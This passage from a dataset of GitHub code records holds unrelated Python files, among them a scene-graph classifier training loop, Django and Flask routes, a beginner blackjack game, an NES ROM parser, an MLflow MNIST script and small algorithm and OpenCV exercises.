with amp.scale_loss(losses, cls_optimizer) as scaled_losses:\n # scaled_losses.backward()\n\n losses.backward()\n # add clip_grad_norm from MOTIFS, tracking gradient, used for debug\n verbose = (iteration % cfg.SOLVER.Classifier_checkpoint_period) == 0 \\\n or print_first_grad # print grad or not\n print_first_grad = False\n clip_grad_norm([(n, p) for n, p in classifier.named_parameters() if p.requires_grad],\n max_norm=cfg.SOLVER.GRAD_NORM_CLIP, logger=logger, verbose=verbose, clip=True)\n cls_optimizer.step()\n scheduler.step()\n\n batch_time = time.time() - end\n end = time.time()\n meters.update(time=batch_time, data=data_time)\n\n eta_seconds = meters.time.global_avg * (max_iter - iteration)\n eta_string = str(datetime.timedelta(seconds=int(eta_seconds)))\n\n if iteration % (cfg.SOLVER.Classifier_checkpoint_period/10) == 0:\n logger.info(meters.delimiter.join(\n [\n \"eta: {eta}\",\n \"iter: {iter}\",\n \"{meters}\",\n \"lr: {lr:.6f}\",\n \"max_iter: {max_iter}\",\n ]\n ).format(\n eta=eta_string,\n iter=iteration,\n meters=str(meters),\n lr=cls_optimizer.param_groups[-1][\"lr\"],\n max_iter=max_iter,\n ))\n\n if iteration % cfg.SOLVER.Classifier_checkpoint_period == 0:\n logger.info(\"Start validating\")\n sgg_model = sgg_model_load_parameterss(sgg_model, classifier, distributed)\n val_result = run_val(cfg, sgg_model, val_data_loaders, distributed, logger)\n arguments[\"last_val_results\"] = val_result\n if arguments[\"last_val_results\"] >= arguments[\"best_val_results\"]:\n arguments[\"best_val_results\"] = arguments[\"last_val_results\"]\n\n logger.info(\"Validation Result: %.4f\" % val_result)\n checkpointer.save(\"model_{:07d}\".format(iteration), **arguments)\n\n total_training_time = time.time() - start_training_time\n total_time_str = str(datetime.timedelta(seconds=total_training_time))\n logger.info(\n \"Total training time: {} ({:.4f} s / it)\".format(\n total_time_str, total_training_time / (max_iter)\n )\n )\n\n with open(output_dir + \"/End_traning\", 'w') as f:\n f.write('End classifier training')\n\n if not cfg.TEST.Skip_test:\n checkpointer.load()\n sgg_model = sgg_model_load_parameterss(sgg_model, classifier, distributed)\n run_test(cfg, sgg_model, distributed, logger)\n\n return classifier, 
sgg_model","repo_name":"wanglei0618/HTCL","sub_path":"maskrcnn_benchmark/HTCL/htcl_classifier_ft.py","file_name":"htcl_classifier_ft.py","file_ext":"py","file_size_in_byte":14224,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"3110254099","text":"import gui.shared_functions.functions as gsf\nimport gui.multivariate_analysis.main_page as gmm\nfrom tkinter import Frame, Button\n\nclass MainPage:\n def __init__(self, master):\n self.dict = {\n 'button_height': 0.05,\n 'start_point': 0,\n 'one_portion': 0.1,\n 'two_portions': 0.2,\n 'three_portions': 0.3,\n 'four_portions': 0.4,\n 'five_portions': 0.5,\n 'six_portions': 0.6,\n 'seven_portions': 0.7,\n 'eight_portions': 0.8,\n 'nine_portions': 0.9,\n 'ten_portions': 1,\n }\n # keep `root` in `self.master`\n self.master = master\n self.frame = Frame(self.master, bg='white')\n self.frame.place(relx=self.dict['one_portion'], rely=self.dict['start_point'], relwidth=self.dict['eight_portions'], relheight=self.dict['ten_portions'])\n self.button1 = Button(self.frame, text=\"A. Single Factor Analysis\" # (*)\n # , command = helloCallBack\n )\n self.button2 = Button(self.frame, text=\"B. Multivariate Analysis\", command=self.openMultivariateAnalysisPage)\n self.button1.place(relx=self.dict['start_point'], rely=self.dict['two_portions'], relwidth=self.dict['ten_portions'], relheight=self.dict['two_portions'])\n self.button2.place(relx=self.dict['start_point'], rely=self.dict['six_portions'], relwidth=self.dict['ten_portions'], relheight=self.dict['two_portions'])\n\n def openMultivariateAnalysisPage(self):\n gsf.deleteWidgets(self.frame)\n # use `root` with another class\n return gmm.MultivariateAnalysisPage(self.master, self.frame, self.dict)\n\n","repo_name":"minhdc2/Credit_Modelling---Desktop-App","sub_path":"gui/main_page.py","file_name":"main_page.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19341455678","text":"def mergeTwoSortedLists(self, head_1, head_2):\n # if head_1 is None and head_2 is None: return None\n dummy_head = Node(None)\n tail, current_1, current_2 = dummy_head, head_1, head_2\n while current_1 is not None and current_2 is not None:\n if current_1.val <= current_2.val:\n tail.next, current_1 = current_1, current_1.next\n else:\n tail.next, current_2 = current_2, current_2.next\n\n tail = tail.next\n\n # work with leftover list\n if current_1 is None:\n tail.next = current_2\n if current_2 is None:\n tail.next = current_1\n\n return dummy_head.next\n\n\"\"\"\nlist1 = 1 -> 3 -> None, list2 = 2 -> 4 -> None\ndummy_head = None -> 1 -> 2 -> 3\ntail.next = 3\ncurrent_1 = None\n- saved_next = None\ncurrent_2 = 2\n\n\"\"\"\n\n\ndef mergeTwoSortedLists(self, head_1, head_2):\n if head_1 is None and head_2 is None:\n return None\n\n if head_1 is None:\n return head_2\n\n if head_2 is None:\n return head_1\n\n if head_1.val <= head_2.val:\n saved_next = head_1.next\n head_1.next = self.mergeTwoSortedLists(saved_next, head_2)\n return head_1\n else:\n saved_next = head_2.next\n head_2.next = self.mergeTwoSortedLists(head_1, saved_next)\n return head_2","repo_name":"quyencodes/structy-py","sub_path":"9-dailies/1-linked_lists/mergeTwoSortedLists.py","file_name":"mergeTwoSortedLists.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39590417230","text":"from prefect import 
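Stripped of logging, checkpointing, and the distributed plumbing, the fine-tuning loop in the HTCL record above reduces to a standard cross-entropy step over cached features. A minimal equivalent (the max_norm value is illustrative; the record reads it from cfg.SOLVER.GRAD_NORM_CLIP):

    import torch
    from torch import nn

    ce_loss = nn.CrossEntropyLoss()

    def train_step(classifier, optimizer, scheduler, feats, rels, device):
        classifier.train()
        rel_dist = classifier(feats.to(device))
        loss = ce_loss(rel_dist.float(), rels.long().to(device))
        optimizer.zero_grad()
        loss.backward()
        # clip gradients before stepping, as clip_grad_norm does in the record
        torch.nn.utils.clip_grad_norm_(classifier.parameters(), max_norm=5.0)
        optimizer.step()
        scheduler.step()
        return loss.item()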
flow, task\nfrom prefect.task_runners import SequentialTaskRunner\nimport argparse\nimport tensorflow as tf\nfrom tensorflow import keras\nimport mlflow\nimport mlflow.keras\nimport os\n\nos.environ['AZURE_STORAGE_ACCESS_KEY'] =\"XXXXXXXXXXXXXXX\"\n\n@task(name=\"MNIST Task Prefect-AKS-MLFlow\")\ndef task_train_mnist():\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--epochs', type=int, default=10, help='Number of epochs to train for')\n    parser.add_argument('--batch_size', type=int, default=128, help='Batch size for training')\n    parser.add_argument('--learning_rate', type=float, default=0.001, help='Learning rate for optimizer')\n    parser.add_argument('--dropout_rate', type=float, default=0.25, help='Dropout rate for regularization')\n    args = parser.parse_args()\n\n    # Load MNIST dataset\n    (x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()\n    x_train = x_train.astype('float32') / 255.0\n    x_test = x_test.astype('float32') / 255.0\n    y_train = keras.utils.to_categorical(y_train)\n    y_test = keras.utils.to_categorical(y_test)\n\n    # Define model architecture\n    model = keras.Sequential([\n        keras.layers.Flatten(input_shape=(28, 28)),\n        keras.layers.Dense(128, activation='relu'),\n        keras.layers.Dropout(args.dropout_rate),\n        keras.layers.Dense(10, activation='softmax')\n    ])\n    model.compile(optimizer=tf.optimizers.Adam(learning_rate=args.learning_rate),\n                  loss='categorical_crossentropy',\n                  metrics=['accuracy'])\n    # Set MLFlow tracking server URL\n    model_name=\"MNIST-Model\"\n    mlflow.set_tracking_uri(\"http://mlflowserver-aci-latest-dnsname.eastus.azurecontainer.io:5000\")\n    mlflow.set_experiment(\"MNIST-Prefect-AKS-MLFlow-ADLS\")\n\n    # Start MLFlow tracking\n    with mlflow.start_run() as run:\n        # Log parameters\n        mlflow.log_param('epochs', args.epochs)\n        mlflow.log_param('batch_size', args.batch_size)\n        mlflow.log_param('learning_rate', args.learning_rate)\n        mlflow.log_param('dropout_rate', args.dropout_rate)\n\n        mlflow.keras.log_model(model,model_name)\n    mlflow.end_run()\n\n@flow(name=\"MNIST Training Flow Prefect-AKS-MLFlow\"\n      #,description=\"MNIST Flow using SequentialTaskRunner\"\n      #,task_runner=SequentialTaskRunner()\n      ,log_prints=True)\ndef train_mnist():\n    print(\"Beginning Training for MNIST! Training on AKS Tracking MLFlow Workflow Prefect\")\n    task_train_mnist()\n\n\nif __name__ == \"__main__\":\n    train_mnist()","repo_name":"keshavksingh/ml-training-prefect-workflow","sub_path":"Train-MLFlow-Prefect.py","file_name":"Train-MLFlow-Prefect.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19416813519","text":"from django.urls import path\nfrom . 
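Worth noting about the MNIST record above: the task compiles and logs the model but never calls `fit`, so the logged weights would be untrained. If training is intended, a step like the following sketch (reusing the script's own variables) would precede `mlflow.keras.log_model`:

    history = model.fit(x_train, y_train,
                        epochs=args.epochs,
                        batch_size=args.batch_size,
                        validation_data=(x_test, y_test))
    mlflow.log_metric("val_accuracy", float(history.history["val_accuracy"][-1]))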
import views\n\nurlpatterns = [\n    path('',views.index,name=\"index\"),\n    path('about/',views.about,name=\"about\"),\n    path('services/',views.services,name=\"services\"),\n    path('Product/',views.Product,name=\"Product\"),\n    path('register/', views.register,name=\"register\"),\n    path('userlogin/',views.userlogin,name=\"userlogin\"),\n    path('login1/', views.login1, name='login1'),\n    path('logout1/', views.logout1, name=\"logout1\"),\n    path('UserTable/', views.UserTable, name=\"UserTable\"),\n    path('delete/<int:id>/', views.delete_data, name=\"deletedata\"),\n    path('update/<int:id>/', views.Update_data,name=\"updatedata\"),\n    path('adduser/', views.adduser, name=\"adduser\"),\n    path('EditProfile/<int:id>/', views.EditProfile, name=\"EditProfile\"),\n    path('forgot/',views.forgot,name='forgot'),\n    path('UserStatus/<int:id>/',views.UserStatus,name=\"UserStatus\"),\n    # path('countries',views.countries,name=\"register\"),\n    path('stateFetch/', views.stateFetch),\n    path('cityFetch/', views.cityFetch),\n    path('ContentTable/',views.ContentTable,name=\"ContentTable\"),\n    path('UpdatePost/',views.UpdatePost,name=\"UpdatePost\"),\n    path('delete/',views.delete_post,name=\"deletepost\"),\n    path('PostStatus/',views.PostStatus,name=\"PostStatus\"),\n]\n\n","repo_name":"Anushit/Adiyogi","sub_path":"frontend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30013621976","text":"from localground.apps.site.tests import ModelMixin\nfrom django import test\nfrom localground.apps.site import models\n\n\nclass BaseAbstractModelClassTest(ModelMixin):\n    # To run test:\n    # $ python manage.py test localground.apps.site.tests.models.PhotoModelTest\n\n    def test_classes_all_have_required_class_properties(self, **kwargs):\n        c = self.model.__class__\n        self.assertTrue(hasattr(c, 'object_type'))\n        self.assertTrue(hasattr(c, 'model_name'))\n        self.assertTrue(hasattr(c, 'pretty_name'))\n        self.assertTrue(hasattr(c, 'model_name_plural'))\n        self.assertTrue(hasattr(c, 'pretty_name_plural'))\n\n    '''\n    ----------------------------------------------------------------------------\n    CLASS PROPERTIES\n    Pick a class that inherits from Base and ensure that all of its methods work.\n    ----------------------------------------------------------------------------\n    '''\n    def test_object_type_prop(self):\n        # Check that it works for a class and a method\n        self.assertEqual(self.model.__class__.object_type, self.object_type)\n        self.assertEqual(self.model.object_type, self.object_type)\n\n    def test_model_name_prop(self):\n        # Check that it works for a class and a method\n        self.assertEqual(self.model.__class__.model_name, self.model_name)\n        self.assertEqual(self.model.model_name, self.model_name)\n\n\n    def test_model_name_plural_prop(self):\n        # Check that it works for a class and a method\n        self.assertEqual(self.model.__class__.model_name_plural, self.model_name_plural)\n        
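For reference on the restored URL converters above: a `path()` converter such as `<int:id>` captures that URL segment and passes it to the view as a keyword argument. A minimal sketch (the view body is invented; `<int:id>` itself is an assumption recovered from the stripped `delete//` patterns):

    from django.http import HttpResponse
    from django.urls import path

    def delete_data(request, id):
        # `id` arrives as an int parsed from the URL segment
        return HttpResponse(f"deleting record {id}")

    urlpatterns = [path("delete/<int:id>/", delete_data, name="deletedata")]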
+{"seq_id":"36366882808","text":"from localground.apps.site.tests import ModelMixin\nfrom django import test\nfrom localground.apps.site import models\n\n\nclass BaseAbstractModelClassTest(ModelMixin):\n    # To run test:\n    # $ python manage.py test localground.apps.site.tests.models.PhotoModelTest\n\n    def test_classes_all_have_required_class_properties(self, **kwargs):\n        c = self.model.__class__\n        self.assertTrue(hasattr(c, 'object_type'))\n        self.assertTrue(hasattr(c, 'model_name'))\n        self.assertTrue(hasattr(c, 'pretty_name'))\n        self.assertTrue(hasattr(c, 'model_name_plural'))\n        self.assertTrue(hasattr(c, 'pretty_name_plural'))\n\n    '''\n    ----------------------------------------------------------------------------\n    CLASS PROPERTIES\n    Pick a class that inherits from Base and ensure that all of methods work.\n    ----------------------------------------------------------------------------\n    '''\n    def test_object_type_prop(self):\n        # Check that it works for a class and a method\n        self.assertEqual(self.model.__class__.object_type, self.object_type)\n        self.assertEqual(self.model.object_type, self.object_type)\n\n    def test_model_name_prop(self):\n        # Check that it works for a class and a method\n        self.assertEqual(self.model.__class__.model_name, self.model_name)\n        self.assertEqual(self.model.model_name, self.model_name)\n\n\n    def test_model_name_plural_prop(self):\n        # Check that it works for a class and a method\n        self.assertEqual(self.model.__class__.model_name_plural, self.model_name_plural)\n        self.assertEqual(self.model.model_name_plural, self.model_name_plural)\n\n    def test_pretty_name_prop(self):\n        # Check that it works for a class and a method\n        self.assertEqual(self.model.__class__.pretty_name, self.pretty_name)\n        self.assertEqual(self.model.pretty_name, self.pretty_name)\n\n    def test_pretty_name_plural_prop(self):\n        # Check that it works for a class and a method\n        self.assertEqual(self.model.__class__.pretty_name_plural, self.pretty_name_plural)\n        self.assertEqual(self.model.pretty_name_plural, self.pretty_name_plural)\n\n    '''\n    ----------------------------------------------------------------------------\n    CLASS PROPERTIES\n    Pick a class that inherits from Base and ensure that all of methods work.\n    ----------------------------------------------------------------------------\n    '''\n    def test_has_required_class_methods(self, **kwargs):\n        c = self.model.__class__\n        import inspect\n        self.assertEqual(\n            inspect.getargspec(c.get_model)[0],\n            ['cls', 'model_name', 'model_name_plural']\n        )\n        self.assertTrue(hasattr(c, 'get_filter_fields'))\n        self.assertTrue(hasattr(c, 'get_content_type'))\n\n    def test_get_model_method_returns_model_unless_args_missing(\n            self, **kwargs):\n        from localground.apps.site import models\n        self.assertEqual(models.Base.get_model(\n            model_name=self.model_name), self.model.__class__\n        )\n        self.assertEqual(models.Base.get_model(\n            model_name_plural=self.model_name_plural), self.model.__class__\n        )\n\n        # Ensure no arguments yields an error message:\n        with self.assertRaises(Exception) as e:\n            models.Base.get_model()\n        self.assertEqual(\n            e.exception.message,\n            \"either model_name or model_name_plural argument is required\"\n        )\n\n    def test_get_filter_fields_returns_correct_tuple(self, **kwargs):\n        from localground.apps.site import models\n        self.assertEqual(models.Base.get_filter_fields(), {})\n        self.assertEqual(len(models.Photo.get_filter_fields()), 11)\n        self.assertEqual(\n            self.model.__class__.get_filter_fields().keys(),\n            self.model.get_filter_fields().keys(),\n            [\n                'attribution',\n                'name',\n                'file_name_orig',\n                'tags',\n                'point',\n                'owner',\n                'project',\n                'caption',\n                'device',\n                'date_created',\n                'id'\n            ])\n\n    def test_get_content_type_returns_correct_type(self, **kwargs):\n        from localground.apps.site import models\n        from django.contrib.contenttypes.models import ContentType\n        self.assertEqual(models.Base.get_content_type().name, \"base\")\n        self.assertEqual(\n            self.model.__class__.get_content_type().name,\n            self.model.get_content_type().name,\n            self.model_name\n        )\n","repo_name":"LocalGround/localground","sub_path":"apps/site/tests/models/abstract_base_tests.py","file_name":"abstract_base_tests.py","file_ext":"py","file_size_in_byte":4622,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"32"}
+{"seq_id":"23474952720","text":"from random import *\n\nglobal p_chips\nglobal bet\n# global p_total\n# global d_total\n# global p_card_1\n# global p_card_2\n# global d_card_1\n# global d_card_2\n# global p_value_1\n# global p_value_2\n# global d_value_2\n# global d_value_2\n\np_chips = 1000\nbet = 25\n# p_total = 0\n# d_total = 0\n# p_card_1 = 0\n# p_card_2 = 0\n# d_card_1 = 0\n# d_card_2 = 0\n# p_value_1 = 0\n# p_value_2 = 0\n# d_value_2 = 0\n# d_value_2 = 0\n\ndef play_again_request():\n    request = input('Would you like to play again? [y/n]: ')\n    while request.lower().replace(' ', '') != 'y' or request.lower().replace(' ', '') != 'n':\n        continue\n    if request.lower().replace(' ', '') == 'y':\n        blackjjack_game()\n    elif request.lower().replace(' ', '') == 'n':\n        quit()\n\ndef deck():\n    deck = []\n    values = ['2','3','4','5','6','7','8','9','10','J','Q','K', 'A']\n    types = ['Clubs','Diamonds','Hearts','Spades']\n    for type in types:\n        for value in values:\n            deck.append(value + ' of ' + type)\n    return deck\ngame_deck = deck()\n\ndef new_card(deck):\n    return deck[randint(0,len(deck)-1)]\n\ndef remove_card(deck, card):\n    return deck.remove(card)\n\ndef card_value(card):\n    if card[:1] in ('23456789'):\n        return int(card[:1])\n    elif card[:1] in ('1JQK'):\n        return 10\n    elif card[:1] == 'A':\n        # need to make it not callable when it is dealer's card, so that dealer choose automatically\n        print(f'One of your cards is {card}.')\n        num = input('Do you want this to be 1 or 11 points? [1/11]: ')\n        while num != '1' or num != '11':\n            if num == '1':\n                print(f'{card} will be equal to 1 now.\\n')\n                return int(1)\n            elif num == '11':\n                print(f'{card} will be equal to 11 now.\\n')\n                return int(11)\n            else:\n                num = input('1 or 11? ')\n\ndef p_hand_creation():\n# Player's Hand creation:\n    p_card_1 = new_card(game_deck)\n    remove_card(game_deck, p_card_1)\n    p_card_2 = new_card(game_deck)\n    remove_card(game_deck, p_card_2)\n    print (f'\\nYou\\'ve got {p_card_1} and {p_card_2}.')\n    p_value_1 = card_value(p_card_1)\n    p_value_2 = card_value(p_card_2)\n    p_total = p_value_1 + p_value_2\n    print(f'Total is: {p_total}\\n')\n    return p_card_1, p_card_2, p_value_1, p_value_2, p_total\n\ndef d_hand_creation():\n# Dealer's Hand creation:\n    d_card_1 = new_card(game_deck)\n    remove_card(game_deck, d_card_1)\n    d_card_2 = new_card(game_deck)\n    remove_card(game_deck, d_card_2)\n    print('Dealer draws two cards - one of them face up and one is a hole card (face down).')\n    print(f'First card is {d_card_1}.\\n')\n    d_value_1 = card_value(d_card_1)\n    d_value_2 = card_value(d_card_2)\n    d_total = d_value_1 + d_value_2\n    return d_card_1, d_card_2, d_value_1, d_value_2, d_total\n\ndef p_hit():\n    p_card_extra = new_card(game_deck)\n    remove_card(game_deck, p_card_extra)\n    p_value_extra = card_value(p_card_extra)\n    p_total += p_value_extra\n    print(f'You\\'ve got {p_card_extra}, and your current Total is {p_total}.')\n    game_condition_check()\n    return p_total\n\ndef p_stand():\n    print(f'\\nThe dealer discloses his hole card. It is {d_card_2}.')\n    print(f'So he has {d_card_1} and {d_card_2} with a Total of {d_total}.\\n')\n    while d_total < 17:\n        print('The Dealer hits again.')\n        d_card_extra = new_card(game_deck)\n        d_value_extra = card_value(d_card_extra)\n        d_total += d_value_extra\n        print(f'The card is {d_card_extra} and new Total is {d_total}\\n')\n    game_condition_check()\n\ndef game_condition_p_blackjack():\n    print('Blackjack! You won! You gain 1.5 * Your Bet.')\n    p_chips += (bet * 1.5)\n    p_chips = round(p_chips)\n    print(f'You currently have {p_chips} chips.')\n    play_again_request()\n\ndef game_condition_d_blackjack():\n    p_chips -= bet\n    print(f'Dealer has Blackjack! You have lost your Bet of {bet}')\n    print(f'Your account is {p_chips} chips now.')\n    play_again_request()\n\ndef game_condition_push():\n    print('It\\'s a Push! (draw) ')\n    print(f'You still have {p_chips} chips.')\n    play_again_request()\n\ndef game_condition_loss():\n    p_chips -= bet\n    print(f'You have {p_total} points. You have lost your Bet of {bet}')\n    print(f'Your account is {p_chips} chips now.')\n    play_again_request()\n\ndef game_condition_check():\n    if p_total == 21 and d_total != 21:\n        game_condition_p_blackjack()\n    if p_total != 21 and d_total == 21:\n        game_condition_d_blackjack()\n    if p_total == 21 and d_total == 21:\n        game_condition_push()\n    if p_total > 21:\n        game_condition_loss()\n\ndef game_body():\n    while True:\n        p_card_1, p_card_2, p_value_1, p_value_2, p_total = p_hand_creation()\n        d_card_1, d_card_2, d_value_1, d_value_2, d_total = d_hand_creation()\n        decision = input('Would you like to Hit or Stand? [h/s]: ')\n        if decision.lower().replace(' ', '') == 'h':\n            p_hit()\n            game_condition_check()\n        if decision.lower().replace(' ', '') == 's':\n            p_stand()\n            game_condition_check()\n\ngame_body()","repo_name":"RealHomoBulla/Beetroot_Academy_Homeworks","sub_path":"BlackJack/MyBlackJack_Ver_1.py","file_name":"MyBlackJack_Ver_1.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29188636640","text":"from Header import Header\n\nclass ROM(object):\n    def __init__(self, rom_path: str):\n        with open(rom_path, \"rb\") as file:\n            self.rom = file.read()\n        self.header = Header(self.rom[0:15])\n        self.trainer_data = []\n        if self.header.trainer:\n            self.trainer_data = self.rom[16: 16 + 512]\n            self.prg_data = self.rom[16 + 512: 16 + 512 + self.header.prg_data_size]\n        else:\n            self.prg_data = self.rom[16: 16 + self.header.prg_data_size]\n        \n","repo_name":"ch3rag/NESPY","sub_path":"ROM.py","file_name":"ROM.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"19897484148","text":"__all__ = [\n    \"dictify\",\n    \"UNICODE\",\n    \"BINARY\"\n]\n\nfrom collections import OrderedDict\nfrom typing import Any, Dict, Union\n\n\ndef dictify(od: Union[OrderedDict, Any]) -> Dict[Any, Any]:\n    \"\"\"Recursively replace OrderedDict with dict\"\"\"\n    if isinstance(od, OrderedDict):\n        return dict((k, dictify(v)) for k, v in od.items())\n    else:\n        return od\n\n\ndef BINARY(s: Union[str, bytes]) -> bytes:\n    if isinstance(s, str):\n        return s.encode(\"utf-8\")\n    elif isinstance(s, bytes):\n        return s\n    else:\n        raise TypeError(\"%s cannot be converted to binary\" % type(s))\n\n\ndef UNICODE(s: Union[str, bytes]) -> str:\n    if isinstance(s, bytes):\n        return s.decode(\"utf-8\")\n    elif isinstance(s, str):\n        return s\n    else:\n        return str(s)\n","repo_name":"skupperproject/skupper-router","sub_path":"python/skupper_router_internal/compat/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"}
+{"seq_id":"29808315715","text":"from flask import Blueprint, request\nfrom pymongo import MongoClient\nfrom bson.json_util import dumps\nimport jwt\nimport os\nimport bcrypt\nimport datetime\nfrom misc.stripeexpire import StripeExpireCheck\n\nuserSettings = Blueprint('userSettings', __name__) # router\n\n# security\ntoken_key = os.environ.get('TOKEN_KEY')\nmongo_url = os.environ.get('MONGODB_URI')\n\n# MongoDB\nclient = MongoClient(mongo_url or 'mongodb://localhost:27017/')\ndb = client.magicpill\ncollection = db.userSettings\n\n\n# get\n@userSettings.route(\"/user-settings\", methods=['POST'])\ndef get():\n    token = request.get_json()['token']\n    # language = request.get_json()['language']\n    decoded = jwt.decode(token, token_key, algorithms='HS256')\n\n    if decoded:\n        results = collection.find({'userId': decoded['_id']})\n        return dumps(results)\n    else:\n        return dumps(False)\n\n\n# new\n@userSettings.route(\"/new-user-settings\", methods=['POST'])\ndef new():\n    token = request.get_json()['token']\n    items = request.get_json()['items']\n    decoded = jwt.decode(token, token_key, algorithms='HS256')\n\n    if decoded:\n        id = decoded['_id']\n        stripe = StripeExpireCheck(id)\n\n        if stripe > 0:\n            collection.insert({\n                \"_id\" : items['_id'],\n                \"userId\" : id,\n                \"dietType\" : items['dietType'],\n                \"lbs\" : items['lbs'],\n                \"macros\" : items['macros']\n            })\n            return dumps(True)\n\n        elif stripe < 0:\n            return dumps({'expired': True})\n\n        return dumps(False)\n\n    else:\n        return dumps(False)\n\n\n# update\n@userSettings.route(\"/user-settings\", methods=['PUT'])\ndef update():\n    token = request.get_json()['token']\n    itemId = request.get_json()['itemId']\n    items = request.get_json()['items']\n    decoded = jwt.decode(token, token_key, algorithms='HS256')\n\n    if decoded:\n        id = decoded['_id']\n        stripe = StripeExpireCheck(id)\n\n        if stripe > 0:\n            collection.update_one({'_id': itemId}, {'$set': items})\n            return dumps(True)\n\n        elif stripe < 0:\n            return dumps({'expired': True})\n\n        return dumps(False)\n\n    else:\n        return dumps(False)\n","repo_name":"tumeware/Calorie-Counter-Server","sub_path":"routes/userSettings.py","file_name":"userSettings.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"70122502811","text":"\nimport os\nfrom tqdm import tqdm\nfrom loguru import logger\nfrom argparse import ArgumentParser\n\nfrom mmcls.apis import init_model\n\nfrom tools.custom_tools.utils import save_labelbee\nfrom tools.custom_tools.inference import \\\n    inference_multi_label_model, inference_multi_task_model\n\n\nATTRIBUTES = ['types', 'colors']\nCLASSES = [\n    ['bus', 'car', 'suv', 'truck', 'van'],\n    ['black', 'blue', 'coffee', 'gray', 'green', 'red', 'orange', 'white', 'yellow']\n]\n\n\ndef main():\n    parser = ArgumentParser()\n    parser.add_argument('config', help='Config file')\n    parser.add_argument('checkpoint', help='Checkpoint file')\n    parser.add_argument('input', default=None, help='Image input path')\n    parser.add_argument('--mode', default='debug', \n                        help='multilabel or multitask, or debug')\n    parser.add_argument(\n        '--device', default='cuda:0', help='Device used for inference')\n    args = parser.parse_args()\n\n    # build the model from a config file and a checkpoint file\n    model = init_model(args.config, args.checkpoint, device=args.device)\n\n    items = [os.path.join(args.input, p) for p in os.listdir(args.input)]\n\n    # predict\n    if args.mode == 'debug':\n        for item in items:\n            try:\n                _ = inference_multi_label_model(model, item, CLASSES)\n            except AttributeError:\n                logger.debug(item)\n        logger.info(\"Everything is ok! You can reset the DEBUG False.\")\n    else:\n        assert args.mode in ['multilabel', 'multitask', 'debug'], \\\n            f\"Mode must be in multilabel or multitask, but got {args.mode}.\"\n        for item in tqdm(items):\n            if args.mode == 'multilabel':\n                res = inference_multi_label_model(model, item, CLASSES, mode='tag')\n            else:\n                res = inference_multi_task_model(model, item, CLASSES, mode='tag')\n            result = {ATTRIBUTES[i]: res['pred_class'][i] for i in range(len(ATTRIBUTES))}\n            save_labelbee(item, result)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"David-19940718/mmclassification","sub_path":"tools/custom_tools/tag_multilabel_and_multitask.py","file_name":"tag_multilabel_and_multitask.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
+{"seq_id":"16465786498","text":"\n\nCOMMAND_MAP = {\n    '>': (1, 0),\n    '<': (-1, 0),\n    '^': (0, 1),\n    'v': (0, -1)\n}\n\n\ndef part_1(data_str):\n    pos_x, pos_y = 0, 0\n    house_count = {(pos_x, pos_y): 1}\n    for command in data_str:\n        pos_x += COMMAND_MAP[command][0]\n        pos_y += COMMAND_MAP[command][1]\n        if (pos_x, pos_y) in house_count:\n            house_count[(pos_x, pos_y)] += 1\n        else:\n            house_count[(pos_x, pos_y)] = 1\n    return len(list(house_count.values()))\n\n\ndef part_2(data_str):\n    pos_s_x, pos_s_y = 0, 0\n    pos_r_x, pos_r_y = 0, 0\n    santa_house_count = {(pos_s_x, pos_s_y): 1}\n    robot_house_count = {(pos_r_x, pos_r_y): 1}\n\n    for idx, command in enumerate(data_str):\n        active = santa_house_count if idx % 2 == 0 else robot_house_count\n\n        active_x, active_y = (pos_s_x, pos_s_y) if idx % 2 == 0 else (pos_r_x, pos_r_y)\n\n        active_x += COMMAND_MAP[command][0]\n        active_y += COMMAND_MAP[command][1]\n\n        if (active_x, active_y) in active:\n            active[(active_x, active_y)] += 1\n        else:\n            active[(active_x, active_y)] = 1\n        if idx % 2 == 0:\n            pos_s_x, pos_s_y = active_x, active_y\n        else:\n            pos_r_x, pos_r_y = active_x, active_y\n\n    santa_house_count.update(robot_house_count)  # combine the dict to remove overlaps\n    return len(list(santa_house_count.values()))\n\n\nwith open('input.in') as f:\n    data = f.read()\n    print(\"Part 1: {}\".format(part_1(data)))\n    print(\"Part 2: {}\".format(part_2(data)))\n","repo_name":"DawoudSheraz/advent-of-code-2015","sub_path":"Day 3/day_3.py","file_name":"day_3.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"2827258023","text":"import cv2\nimport numpy as np\n\nframe = cv2.imread('kus.png',0)\n#Numpy ile kernel matris tanımı\nkernel = np.ones((25,25),np.uint8)\n\n#Açma\nsonuc = cv2.morphologyEx(frame, cv2.MORPH_OPEN, kernel)\ncv2.imshow(\"Sonuc\", sonuc)\n\ncv2.waitKey(0)","repo_name":"mesutpiskin/computer-vision-guide","sub_path":"code/morfolojik-goruntu-isleme/python/acinim-opening.py","file_name":"acinim-opening.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"tr","doc_type":"code","stars":359,"dataset":"github-code","pt":"32"}
